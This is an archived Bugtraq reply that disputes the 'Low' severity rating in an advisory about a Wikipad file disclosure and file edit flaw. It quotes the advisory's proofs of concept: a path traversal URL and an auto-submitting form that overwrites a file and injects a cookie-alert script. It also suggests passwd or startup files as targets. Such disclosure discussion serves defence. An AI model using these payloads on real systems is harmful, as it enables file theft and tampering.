| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <alpine.LNX.2.00.1104282358370.21990@forced.attrition.org> Date: Fri, 29 Apr 2011 00:02:43 -0500 (CDT) From: security curmudgeon <jericho@...rition.org> To: advisory@...ridge.ch Cc: bugtraq@...urityfocus.com Subject: Re: HTB22827: File Content Disclosure in Wikipad : Vulnerability ID: HTB22827 : Reference: http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html : Vulnerability Type: File Content Disclosure : Risk level: Low : Vulnerability Details: : The vulnerability exists due to failure in the "/pages.php" script to properly sanitize user-supplied input in "id" variable. We can disclose content of ".txt" files on file system. : : The following PoC is available: : http://host/pages.php?id=./../../../../../txt_file So you can dump the contents of an arbitrary file, presumably outside the web root, and this is 'Low' severity? Ok, perhaps authentication is required or something else makes it a bit tricky.. : Also, we can change content of this file by using PoC: : : <form action="http://host/pages.php?action=edit&id=./../../../../../txt_file&title=test" method="post" name="main"> : <input type="hidden" name="data[text]" value='new content"><script>alert(document.cookie)</script>'> : </form> : : <script> : document.main.submit(); : </script> Now you can *edit* any file on the system, and this is 'Low' severity? Worse, you throw in some script code instead of editing something a bit more serious like editing a system startup file, passwd or some other form of remote access? At the very least, this would be 'Medium' by most standards.
Powered by blists - more mailing lists